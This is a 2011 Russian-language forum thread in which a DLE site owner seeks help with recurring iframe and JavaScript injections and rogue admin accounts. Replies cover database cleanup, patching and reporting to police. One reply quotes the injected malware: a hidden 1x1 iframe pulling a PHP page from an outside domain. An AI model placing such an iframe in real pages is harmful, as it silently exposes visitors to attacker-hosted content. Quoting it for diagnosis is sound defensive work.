morgannZ 0 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 Наверное, стоит начать с начала. Несколько лет назад создал сайт на Nulled-движке DLE, тогда ещё и не знал, что это такое, просто посоветовали. Меньше года назад купил лицензию. Но до этого были проблемы с вирусами. iframe они постоянно добавляли. Вобщем, сменил на лицензию и антивирусом нашёл вроде-бы всё, почистил, сменил все явки и пароли (к почте, к БД, к хостингу) и больше полугода всё было нормально. С месяц назад начали появляться Новые админы на сайте, я, естественно, удалял их. Была версия 8.5. Вот сегодня опять вирусы обложили. iframe добавляет в начало сайта (в шаблонах не найти) и в некоторых новостях пользователей в конце яваскрипты докидывает. До этого находил расположение вредоносного кода с помощью Netbeans, но в этот раз не могу найти им ничего, просто мистика какая-то. Антивирус тоже ничего не нашёл. Обновил движок до версии 9.2 но не помогло. ВОт сейчас отключил сайт и пытаюсь разобраться. Но не выходит что делать? сайт 1000designs.ru Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 Нужно чистить базу данных. Цитата Ссылка на сообщение Поделиться на других сайтах
morgannZ 0 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 Автор Каким образом? что чистить? что искать? какие параметры? можно развёрнутый ответ? Цитата Ссылка на сообщение Поделиться на других сайтах
ower_xz 116 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 (изменено) Более подробно.. Сайт заражен: <iframe src='http://gutten-tag-tag.co.cc/f/jldtjuc.php?n=40941' width='1' height='1' frameborder='0'></iframe> и т.д. Если у вас еще с версии 8.5 вирусы лезут, значит в свое время не стояли патчи безопасности и теперь, скорее всего, этот код уже в БД. А если после обновления на 9.2 было все нормально, а потом стали появляться, то где-то дыра есть... phpMyAdmin - какая версия? Там тоже были дыры. Посмотрите dbconfig.php, не дописано ли там что... Попробуйте использовать перестроение новостей в админке: этот раздел перестраивает новости в соответствии с настройками скрипта и требованиями безопасности скрипта. JS код добавить в новость через скрипт нельзя, это запрещено, поэтому при перестроении новостей, скрипт автоматически его зачищает. Изменено 18 января 2011 пользователем ower_xz Цитата Ссылка на сообщение Поделиться на других сайтах
Azat868 2 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 (изменено) Я бы вообще начал с нуля....снес бы все к черту включая и смену хостера на зло тем кто занимается взломом. Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину? Кстати на сайт вообще не пускает Внимание! Посещение этого сайта может нанести вред вашему компьютеру. Изменено 18 января 2011 пользователем Azat868 Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 morgannZ, пишите мне в ICQ. Помогу почистить БД Цитата Ссылка на сообщение Поделиться на других сайтах
TCT 0 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 такая же проблема... причем поиск кода по файлам на сервере и поиск по бд ничего не находит... бекап помогает на некоторое время, но через несколько часов снова сайты заражаются, смена паролей никак не помогает ( Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 TCT, пишите мне в ICQ, помогу решить Вашу проблему Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 998 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину? Конечно, вам не нужно выискивать чей либо IP, и прочее, это уголовно наказуемое деяние, просто идете и пишите заявление в милицию. Возбуждается уголовоное дело, отдел K сам изымит все логи сервера, опеределит IP, и даже если он был за прокси и прочим, реальный IP все равно определяется по датам и времени обращений к прокси, для этого делаются запросы провайдерам. Все это делаете не вы, а отдел K, вероятность того что его найдут, очень высока, более того, это уголовное преступление, он будет осужден по уголовной статье, а не вы в суд подаете и прочее. Вы только пишите заявление в милицию и все. Цитата Ссылка на сообщение Поделиться на других сайтах
AshaS 2 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 TCT, пишите мне в ICQ, помогу решить Вашу проблему Ты не устал каждому объяснять? )))) Уже бы инструкцию написал и здесь выложил. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 Вы только пишите заявление в милицию и все. Azat868, вероятнее всего милиция откажется от такого. Тогда просите у милиции отказ в письменной форме Цитата Ссылка на сообщение Поделиться на других сайтах
ArtemNY 17 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину? Конечно, вам не нужно выискивать чей либо IP, и прочее, это уголовно наказуемое деяние, просто идете и пишите заявление в милицию. Возбуждается уголовоное дело, отдел K сам изымит все логи сервера, опеределит IP, и даже если он был за прокси и прочим, реальный IP все равно определяется по датам и времени обращений к прокси, для этого делаются запросы провайдерам. Все это делаете не вы, а отдел K, вероятность того что его найдут, очень высока, более того, это уголовное преступление, он будет осужден по уголовной статье, а не вы в суд подаете и прочее. Вы только пишите заявление в милицию и все. Я смеюсь! А что... я всегда смеюсь когда мне смешно... Это в странах бывших совков (ныне СНГ, не знаю о какой конкретно из них идёт речь) будут искать злостного террорюгу взломавшего какой-то там вшивый сайтик, которого и в поисковиках то нету? Вы это серьёзно сказали или так... поиздеваться над вопросящим? Цитата Ссылка на сообщение Поделиться на других сайтах
AshaS 2 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину? Конечно, вам не нужно выискивать чей либо IP, и прочее, это уголовно наказуемое деяние, просто идете и пишите заявление в милицию. Возбуждается уголовоное дело, отдел K сам изымит все логи сервера, опеределит IP, и даже если он был за прокси и прочим, реальный IP все равно определяется по датам и времени обращений к прокси, для этого делаются запросы провайдерам. Все это делаете не вы, а отдел K, вероятность того что его найдут, очень высока, более того, это уголовное преступление, он будет осужден по уголовной статье, а не вы в суд подаете и прочее. Вы только пишите заявление в милицию и все. Я смеюсь! А что... я всегда смеюсь когда мне смешно... Это в странах бывших совков (ныне СНГ, не знаю о какой конкретно из них идёт речь) будут искать злостного террорюгу взломавшего какой-то там вшивый сайтик, которого и в поисковиках то нету? Вы это серьёзно сказали или так... поиздеваться над вопросящим? Ну он работал в милиции и видимо описал порядок действий. А будут искать или нет, это другой вопрос. Покрайне мере должны взять заявление я так думаю , но при этом нужно надеется что пострадавший сайт сам не противоречит содержанием, дружит с налоговой(если это магазин какойто) и домен записан на вас, а то какбы не пришлось из пострадавших, преворатится в обвиняемых))) Цитата Ссылка на сообщение Поделиться на других сайтах
ArtemNY 17 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 А будут искать или нет, это другой вопрос... Ну и смысл тогда воздух пинать? Цитата Ссылка на сообщение Поделиться на других сайтах
Azat868 2 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 и домен записан на вас, а то какбы не пришлось из пострадавших, преворатится в обвиняемых))) Полностью согласен, если имеется нелегальный контент и какая-либо реклама смысла не будет идти писать заяву. Да и не верится что местные будут отправлять отделу К такие заявы, забьют наверное Цитата Ссылка на сообщение Поделиться на других сайтах
maestro2024 0 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину? Конечно, вам не нужно выискивать чей либо IP, и прочее, это уголовно наказуемое деяние, просто идете и пишите заявление в милицию. Возбуждается уголовоное дело, отдел K сам изымит все логи сервера, опеределит IP, и даже если он был за прокси и прочим, реальный IP все равно определяется по датам и времени обращений к прокси, для этого делаются запросы провайдерам. Все это делаете не вы, а отдел K, вероятность того что его найдут, очень высока, более того, это уголовное преступление, он будет осужден по уголовной статье, а не вы в суд подаете и прочее. Вы только пишите заявление в милицию и все. Я смеюсь! А что... я всегда смеюсь когда мне смешно... Это в странах бывших совков (ныне СНГ, не знаю о какой конкретно из них идёт речь) будут искать злостного террорюгу взломавшего какой-то там вшивый сайтик, которого и в поисковиках то нету? Вы это серьёзно сказали или так... поиздеваться над вопросящим? Ну он работал в милиции и видимо описал порядок действий. А будут искать или нет, это другой вопрос. Покрайне мере должны взять заявление я так думаю , но при этом нужно надеется что пострадавший сайт сам не противоречит содержанием, дружит с налоговой(если это магазин какойто) и домен записан на вас, а то какбы не пришлось из пострадавших, преворатится в обвиняемых))) Какая милиция будет в наших странах что то делать? Тем более изворачиваться по пустякам.. Понимаю бы мега еротический проект - где можно "принявши" админа - заработать бабла - что бы дело не открывать. Пишите в милиции посмеются... По поводу темы вопроса. Создайте с нуля БД. И будет вам счастье. Мало ли вы там сейчас тянете с собою всю дорогу... Цитата Ссылка на сообщение Поделиться на других сайтах
Sokolov 0 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 Пишите в милиции посмеются... Зря Вы так думаете. Уже давно не смеются, во всяком случае на Украине, а реально ищут и находят Цитата Ссылка на сообщение Поделиться на других сайтах
ArtemNY 17 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 Уже давно не смеются... А что так? Чувство юмора потеряли? Цитата Ссылка на сообщение Поделиться на других сайтах
Scharysch 0 Опубликовано: 20 января 2011 Рассказать Опубликовано: 20 января 2011 мне тоже 2 раза ломали, но почистив базу, сменив пароли, поставив заплатки, удалив "юзера" (взломщика) - пока все хорошо. Правда под новым паролем не вхожу в админпанель. Работаю через денвер - делаю базу, китаю ее через SSH на сервер, распаковываю - опять меняю пароль и т.д.Правда неделю на сайте сидел какой-то робот-взломщик - долбил одним и тем же запросом сайт - трафик увеличился беспричинно в 4 раза. Думаю, искали дыры. Но сейчас упал до нормального. Пока работаю. По поводу phpMyAdmin у моего хостера стоит 2-ка. попробовала его развести на 3-ку. Сказал, что взлом через сервер исключен поэтому у всех 2-ка и ни одного взлома через phpMyAdmin 2 не было ни у кого. Хостер Агава. Цитата Ссылка на сообщение Поделиться на других сайтах
ArtemNY 17 Опубликовано: 20 января 2011 Рассказать Опубликовано: 20 января 2011 Я вообще никогда не понимал такие темы... Это всё ровно что делать переливание крови и донором будет больной ВИЧ, а потом сидеть и думать как же мне вылечить СПИД... (это я так, для наглядности примера) Не пользуйтесь подделкой и голова болеть не будет! Но нет, все хотят шару! А Бесплатный сыр, только в мышеловке... Это напоминает мне анекдот из 90х: Сын пятикласник подходит к отцу, новому русскому, и спрашивае: - Пап, как найти обьём шара? - Шара, сынок, обьёма не имеет! Так и тут, шара обьёма не имеет и гемморой с этой шарой обьёма не имеет... ЗЫ сайт кстате понравился! Всмысле тематика и содержание. Зафейворитил бы если-бы на сайте вирусов небыло... Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.